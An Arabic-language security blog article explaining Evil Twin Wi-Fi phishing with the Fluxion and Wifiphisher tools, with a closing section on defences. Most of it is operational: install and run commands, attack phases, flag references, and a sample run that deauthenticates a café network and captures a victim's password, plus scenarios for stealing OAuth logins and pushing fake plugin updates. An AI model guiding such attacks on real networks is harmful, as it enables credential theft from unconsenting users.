Evil Twin: الشبكة الوهمية التي تنتظرك في كل مكان — كيف تحمي نفسك؟

Evil Twin: الشبكة الوهمية التي تنتظرك في كل مكان — كيف تحمي نفسك؟

Fluxion & Wifiphisher — فن خداع الشبكات | GloSecLab
SOCIAL ENGINEERING WEAPONS

Fluxion

⚡ VS ⚡

Wifiphisher

أخطر أسلحة الخداع الاجتماعي في اختبار الشبكات اللاسلكية — Evil Twin + Captive Portal + Social Engineering في أداتين لا تُقاومان

[+] Deauth attack launched...
EVIL TWIN ATTACK
CAPTIVE PORTAL
SOCIAL ENGINEERING
WPA/WPA2 BYPASS
SCROLL
🎭
Fluxion
// SOCIAL ENGINEERING FRAMEWORK
يستخدم Handshake + Captive Portal للتحقق من كلمة المرور تلقائياً. يوقف الهجوم بمجرد إدخال الضحية كلمة المرور الصحيحة.
VS
🎣
Wifiphisher
// AUTOMATED PHISHING ENGINE
يُنشئ Evil Twin تلقائياً مع Phishing Pages جاهزة لسرقة Credentials — بدون Handshake وبدون Brute Force.
// 01 — THE CONCEPT
01

مفهوم Evil Twin وCaptive Portal

الخداع الذي يعمل على البشر لا على التشفير

الفرق الجوهري بين Fluxion/Wifiphisher وأدوات مثل Aircrack-ng وHashcat هو الهدف: بدل كسر التشفير، هاتان الأداتان تستهدفان الإنسان نفسه — يجعلانه يُدخل كلمة المرور بيده ويسلّمها طوعاً.

هذا النوع من الهجمات يُسمى Social Engineering Attack — وهو الأخطر لأنه لا يعتمد على قوة حوسبة أو Wordlist، بل على ثقة الضحية بشبكتها المألوفة.

// STEP 01
🎭 Evil Twin AP
إنشاء شبكة وهمية بنفس SSID الشبكة الحقيقية لكن بدون كلمة مرور (Open Network) أو بنفس الإعدادات.
// STEP 02
💥 Deauth Flood
إرسال حزم Deauthentication مستمرة لفصل كل الأجهزة عن الشبكة الحقيقية وإجبارها على الانتقال للـ Evil Twin.
// STEP 03
🌐 Captive Portal
صفحة وهمية تطلب من الضحية إدخال كلمة مرور الـ WiFi "للتحقق" أو "لإعادة الاتصال بعد تحديث".
// STEP 04
✅ Auto-Verify
الأداة تتحقق تلقائياً من كلمة المرور المُدخلة مقارنةً بالـ Handshake الملتقط. إذا كانت صحيحة تُسجَّل وتنتهي العملية.
⚠️ تحذير قانوني: هجمات Evil Twin وCaptive Portal على شبكات لا تمتلك إذناً صريحاً باختبارها هي جريمة جنائية خطيرة في كل دول العالم. هذا المقال للأغراض التعليمية وإدراك المخاطر فقط.
// 02 — FLUXION
02

Fluxion — الشرح الكامل

"Fluxion is the Future of MITM WPA Attacks"

Fluxion هي إعادة كتابة لأداة linset الأصلية، طوّرها Mr. SAGE مع مجموعة من المطورين. تجمع بين Handshake Snooper (لالتقاط والتحقق من الـ Handshake) وCaptive Portal (لجمع كلمة المرور من الضحية مباشرة) في واجهة تفاعلية بسيطة.

الميزة الأساسية لـ Fluxion هي Auto-Verification — كل كلمة مرور تُدخلها الضحية يتم التحقق منها فوراً مقابل الـ Handshake الملتقط. إذا كانت صحيحة، يُوقف الهجوم تلقائياً ويُسجَّل المفتاح.

تعمل على Kali Linux وBlackArch، وتستخدم في الخلفية: Aircrack-ng للـ Handshake، MDK3/MDK4 للـ Deauth، Hostapd للـ Fake AP، وdnsmasq للـ DNS Redirect.

💡 وضعا الهجوم في Fluxion:
Handshake Snooper — يلتقط الـ 4-Way Handshake لاستخدامه في التحقق لاحقاً
Captive Portal — يُنشئ Evil Twin + صفحة وهمية لجمع كلمة المرور
// 03 — FLUXION SETUP
03

تثبيت Fluxion وتشغيله

التجهيز للعملية

// FLUXION — Installation & Launch
# تثبيت Fluxion من GitHub root@kali:~$ git clone https://github.com/FluxionNetwork/fluxion root@kali:~$ cd fluxion # تثبيت الـ Dependencies تلقائياً root@kali:~$ ./fluxion.sh -i Installing dependencies... hostapd, dnsmasq, mdk4, aircrack-ng... [✓] All dependencies installed # تشغيل Fluxion (الوضع التفاعلي) root@kali:~$ sudo ./fluxion.sh # تشغيل Auto Mode root@kali:~$ sudo ./fluxion.sh -a # استهداف شبكة بالـ ESSID مباشرة root@kali:~$ sudo ./fluxion.sh -e "TargetNetwork" -c 6 # تشغيل بلغة محددة root@kali:~$ sudo ./fluxion.sh -l English # Debug Mode root@kali:~$ sudo ./fluxion.sh -d # تحديث Fluxion root@kali:~$ git pull origin master root@kali:~$ ./fluxion.sh -i
🔧 المتطلبات: كارتان لاسلكيان (الأفضل) — واحد للـ Evil Twin AP وآخر للـ Deauth. أو كارت واحد يدعم Virtual Interface (VIF) مثل Alfa AWUS036ACH مع Chipset Ralink أو MediaTek.
// 04 — FLUXION ATTACK
04

مراحل الهجوم مع Fluxion

العملية الكاملة خطوة بخطوة

01

تشغيل Fluxion واختيار اللغة

تظهر واجهة نصية تطلب اختيار اللغة. اختر English أو العربية.

02

اختيار Wireless Interface

حدد الكارت اللاسلكي الذي ستستخدمه. Fluxion تُفعّل Monitor Mode تلقائياً.

03

مسح الشبكات — اختيار الهدف

تفتح نافذة Airodump-ng لمسح الشبكات. بعد ظهور الهدف، اضغط Ctrl+C وحدد رقمه.

04

PHASE 1 — Handshake Snooper

اختر Handshake Snooper. Fluxion ستُرسل Deauth وتنتظر العميل يُعيد الاتصال لالتقاط الـ Handshake.

05

PHASE 2 — Captive Portal Attack

اختر Captive Portal. حدد الـ Handshake الملتقط، نوع الـ Fake AP (hostapd أو airbase-ng)، ونوع الـ Portal Page.

06

اختيار Portal Template

Fluxion تأتي مع قوالب جاهزة لصفحات مختلفة (Generic، Router Firmware Update، ISP Login...). اختر الأنسب للهدف.

07

Auto-Verification والنتيجة

بمجرد اتصال الضحية وإدخال كلمة المرور، يتحقق Fluxion منها فوراً. إذا كانت صحيحة، يوقف الهجوم ويحفظ المفتاح تلقائياً.

// FLUXION — Key Flags Reference
# الخيارات الرئيسية في Fluxion -a # Auto Mode — كل الخطوات تلقائياً -e ESSID # استهداف شبكة بالاسم مباشرة -c CHANNEL # تحديد القناة -l LANG # تحديد اللغة (English, Arabic...) -d # Debug Mode -i # تثبيت/تحديث الـ Dependencies -m # Manual Mode (بدون Auto) -k # قطع الاتصال اللاسلكي الحالي -r # Reload Driver -x # استخدام xterm بدل tmux -v # عرض رقم الإصدار # متغيرات البيئة FLUXIONAuto=1 # Auto Mode عبر Environment Variable FLUXIONDebug=1 # Debug Mode FLUXIONWIKillProcesses=1 # إيقاف العمليات المتعارضة تلقائياً
// 05 — WIFIPHISHER
05

Wifiphisher — الشرح الكامل

Automated Phishing Attacks against WiFi Networks

Wifiphisher هي أداة Python مفتوحة المصدر تُنشئ Evil Twin AP وتُشغّل Phishing Pages جاهزة تستهدف مختلف الأجهزة والـ Routers. الفرق الأساسي عن Fluxion: لا تحتاج Handshake — بدل التحقق من كلمة المرور، تأخذ أي بيانات يُدخلها المستخدم وتحفظها.

تدعم Wifiphisher عدة Attack Scenarios جاهزة:

// SCENARIO 01
Firmware Upgrade
صفحة تطلب كلمة مرور الـ WiFi بحجة "تحديث برنامج الراوتر". الأكثر إقناعاً.
// SCENARIO 02
OAuth Login
صفحة تسجيل دخول Google/Facebook وهمية لسرقة Credentials الحسابات لا فقط كلمة الـ WiFi.
// SCENARIO 03
Browser Plugin Update
تطلب تثبيت "تحديث" لـ Flash أو Browser Plugin — لتنفيذ Malware على جهاز الضحية.
// SCENARIO 04
Network Manager
محاكاة نافذة Network Manager الخاصة بنظام Ubuntu/Windows لجمع كلمة مرور الـ WiFi.
// SCENARIO 05
Captive Portal
صفحة "تسجيل دخول للإنترنت" مثل تلك الموجودة في الفنادق والمقاهي.
// SCENARIO 06
Enterprise (KARMA)
هجوم KARMA — الاستجابة لأي Probe Request من أجهزة تبحث عن شبكات محفوظة.
// 06 — WIFIPHISHER SETUP
06

تثبيت Wifiphisher وتشغيله

جاهزة في Kali Linux

// WIFIPHISHER — Installation
# مثبتة في Kali Linux — تحديث root@kali:~$ sudo apt update && sudo apt install wifiphisher -y # من GitHub (أحدث إصدار) root@kali:~$ git clone https://github.com/wifiphisher/wifiphisher root@kali:~$ cd wifiphisher && sudo python3 setup.py install # تشغيل بسيط (اختيار تلقائي) root@kali:~$ sudo wifiphisher # استهداف شبكة محددة + اختيار Scenario root@kali:~$ sudo wifiphisher -aI wlan0 -jI wlan1 -p firmware-upgrade -e "TargetNetwork" # OAuth Login Scenario root@kali:~$ sudo wifiphisher -p oauth-login # KARMA Attack root@kali:~$ sudo wifiphisher --force-hostapd -p wifi_connect # تحديد اللغة للـ Phishing Page root@kali:~$ sudo wifiphisher -p firmware-upgrade --phishing-pages-lang AR # حفظ الـ Credentials في ملف root@kali:~$ sudo wifiphisher -p firmware-upgrade -o /tmp/creds.txt # Custom Phishing Page خاصة root@kali:~$ sudo wifiphisher -p /path/to/custom-scenario
// 07 — WIFIPHISHER ATTACKS
07

هجمات Wifiphisher المتعددة

سيناريوهات متقدمة

إليك أهم الـ Flags والهجمات في Wifiphisher:

// WIFIPHISHER — Full Flags Reference
## الـ Interfaces -aI IFACE # الكارت المستخدم لإنشاء الـ Evil Twin AP -jI IFACE # الكارت المستخدم للـ Deauth (jamming) -iI IFACE # الكارت لمسح الشبكات فقط ## الهدف -e ESSID # استهداف شبكة بالاسم -c CHANNEL # تحديد القناة ## الـ Phishing Scenarios -p SCENARIO # اختيار السيناريو # firmware-upgrade — تحديث برنامج الراوتر # oauth-login — تسجيل دخول Google/Facebook # browser-plugin-update — تثبيت Plugin وهمي # wifi_connect — Network Manager مزيف # captive-portal — صفحة Hotel/Cafe WiFi ## خيارات إضافية --force-hostapd # استخدام hostapd بدل airbase-ng --no-deauth # بدون Deauth — Evil Twin فقط --phishing-pages-lang AR # الـ Portal باللغة العربية --handshake-capture # التقاط Handshake في نفس الوقت -o FILE # حفظ الـ Credentials في ملف -lC FILE # ملف Log للعملية -dI # عرض معلومات الـ Interfaces ## مثال متكامل root@kali:~$ sudo wifiphisher \ -aI wlan0 -jI wlan1 \ -e "CoffeeShop_WiFi" \ -p firmware-upgrade \ --phishing-pages-lang AR \ -o /tmp/captured.txt [+] Evil Twin AP created: CoffeeShop_WiFi [+] Deauthentication attack launched on channel 6 [+] Captive portal running on 192.168.0.1 [!] Victim connected to Evil Twin [+] CREDENTIALS CAPTURED: wifi_pass: MySecretPass123
💡 Custom Phishing Page: يمكن إنشاء سيناريو مخصص بـ HTML/CSS/JS وتمريره لـ Wifiphisher. ضع الملفات في مجلد وأشر إليه بـ -p /path/to/scenario. الصفحة تستقبل الـ POST Request تلقائياً.
// 08 — COMPARISON
08

مقارنة شاملة: أيهما أقوى؟

كل أداة لها ميدانها

المعيار Fluxion Wifiphisher
يتطلب Handshake✔ ضروري✘ غير مطلوب
Auto-Verification كلمة المرور✔ تلقائي✘ يأخذ أي إدخال
سيناريوهات جاهزة⚡ محدودة✔ متعددة (6+)
صعوبة الاستخداممتوسطسهل نسبياً
يعمل بكارت واحد⚡ بصعوبة⚡ بصعوبة
يدعم Custom Pages⚡ محدود✔ كامل
هجوم KARMA
OAuth/Credential Stealing
التحديث والصيانة✔ نشط✔ نشط
مناسب للـ WPA3✘ ضعيف⚡ جزئياً
مناسب للـ CTF

Fluxion أفضل عندما تريد التحقق التلقائي من كلمة المرور — لن تحصل على كلمة مرور خاطئة.
Wifiphisher أفضل عندما تريد سرقة أنواع مختلفة من الـ Credentials أو تنفيذ هجمات KARMA على أجهزة متعددة.

// 09 — DEFENSE
09

الدفاع والحماية

كيف تحمي نفسك من Evil Twin؟

// DEFENSE 01
🔐 لا تُدخل كلمة مرور WiFi أبداً
لا يوجد Captive Portal حقيقي يطلب كلمة مرور الـ WiFi بعد الاتصال. إذا طُلب منك ذلك فأنت في Evil Twin.
// DEFENSE 02
📶 WPA3 + PMF
WPA3 مع Protected Management Frames يجعل هجمات Deauth أصعب بكثير ويحمي من معظم Evil Twin Attacks.
// DEFENSE 03
🔍 تحقق من الـ BSSID
تأكد دائماً أن الـ MAC Address (BSSID) للشبكة التي اتصلت بها يطابق الراوتر الأصلي — Evil Twin يكون له MAC مختلف.
// DEFENSE 04
🛡️ استخدم VPN دائماً
حتى لو اتصلت بـ Evil Twin، الـ VPN يشفّر كل Traffic ويمنع اعتراضه عبر MitM.
// DEFENSE 05
📵 تعطيل Auto-Connect
لا تسمح للجهاز بالاتصال تلقائياً بالشبكات المحفوظة — هذا يحميك من KARMA Attack.
// DEFENSE 06
🔔 Wireless IDS
أدوات مثل Kismet وAirDefense تكتشف Deauth Floods والـ Rogue APs وتُنبّه المسؤول فوراً.
⚠️ للشركات والمؤسسات: استخدم WPA2/WPA3-Enterprise (802.1X) مع RADIUS Server — يجعل Evil Twin عديم الجدوى لأن كل مستخدم له Credentials خاصة به.

Fluxion وWifiphisher يُثبتان أن أقوى هجمات الـ WiFi لا تكسر التشفير — بل تخدع الإنسان. هذا هو جوهر Social Engineering: لا يهم قوة كلمة المرور إذا كان الضحية سيُسلّمها بنفسه. معرفة هذه الهجمات هي الخطوة الأولى لبناء دفاع حقيقي ضدها.

GloSecLab

// PENETRATION TESTING · KALI LINUX · OSINT //

© 2025 GloSecLab — للأغراض التعليمية والأخلاقية فقط